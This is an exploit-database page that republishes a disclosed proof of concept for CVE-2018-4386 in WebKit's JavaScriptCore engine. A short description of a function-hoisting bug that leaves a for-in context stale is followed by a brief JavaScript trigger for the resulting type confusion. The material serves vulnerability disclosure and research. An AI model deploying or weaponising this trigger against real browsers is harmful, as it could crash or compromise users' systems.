[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WebKit JSC - BytecodeGenerator::hoistSloppyModeFunctionIfNecessary Exploit

Author
Google Security Research
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-31696
Category
dos / poc
Date add
29-11-2018
CVE
CVE-2018-4386
Platform
multiple
WebKit JSC - BytecodeGenerator::hoistSloppyModeFunctionIfNecessary Does not Invalidate the ForInContext Object

/*
This is simillar to  issue 1263 . When hoisting a function onto the outer scope, if it overwrites the iteration variable for a for-in loop it should invalidate the corresponding ForInContext object, but it doesn't. As a result, an arbitrary object can be passed as the property variable to the op_get_direct_pname handler which uses the property variable directly as a string object without any check.
 
PoC:
*/
 
function trigger() {
    let o = {a: 1};
    for (var k in o) {
        {
            k = 0x1234;
 
            function k() {
 
            }
        }
 
        o[k];
    }
}
 
trigger();

#  0day.today [2024-12-24]  #